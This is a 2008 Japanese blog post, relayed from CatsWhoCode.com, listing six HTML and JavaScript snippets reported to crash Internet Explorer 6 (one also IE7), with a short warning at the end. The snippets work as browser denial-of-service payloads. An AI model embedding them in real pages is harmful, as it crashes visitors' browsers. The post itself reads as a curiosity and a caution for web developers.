IE6をクラッシュさせてしまう6つのコード
Post on:2008年6月20日
CatsWhoCode.comのエントリーから、IE6を(最後のはIE7も)クラッシュさせてしまうコードを6つ紹介します。
6 html and javascript codes to crash IE6
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 |
<textarea name="code" class="html" cols="60" rows="5"> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html> <head> <title>CRASH-IE</title> <style type="text/css"> html, body{ overflow: hidden; scrollbar-base-color: #330066; } .crash{ position:absolute; left:200px; top:200px; width:200px; } </style> <script type="text/javascript"> function galgenfrist(){ window.setTimeout('crashIE();',1000); } function crashIE(){ var moveNode = document.getElementById("move"); if(moveNode){ moveNode.style.top = "100px"; moveNode.style.left = "200px"; } } </script> </head> <body onload="galgenfrist();"> <h1>CRASH-IE</h1> <div id="move" class="crash"> <table> <tbody> <tr> <td> <textarea></textarea> </td> </tr> </tbody> </table> </div> </body> </html> </textarea> |
1 2 3 |
<textarea name="code" class="html" cols="60" rows="5"> <script>for (x in document.write) { document.write(x);}</script> </textarea> |
1 2 3 |
<textarea name="code" class="html" cols="60" rows="5"> <style>*{position:relative}</style><table><input></table> </textarea> |
1 2 3 |
<textarea name="code" class="html" cols="60" rows="5"> <body onLoad=”window()”> </textarea> |
1 2 3 |
<textarea name="code" class="html" cols="60" rows="5"> <style>@;/* </textarea> |
1 2 3 4 5 6 7 8 9 10 |
<textarea name="code" class="html" cols="60" rows="5"> function getX(oElement){ var iReturnValue = 0; while(oElement != null){ iReturnValue += oElement.offsetLeft; oElement = oElement.offsetParent; } return iReturnValue; } </textarea> |
クラッシュするのは嫌なので試していませんが、気をつけてください。
sponsors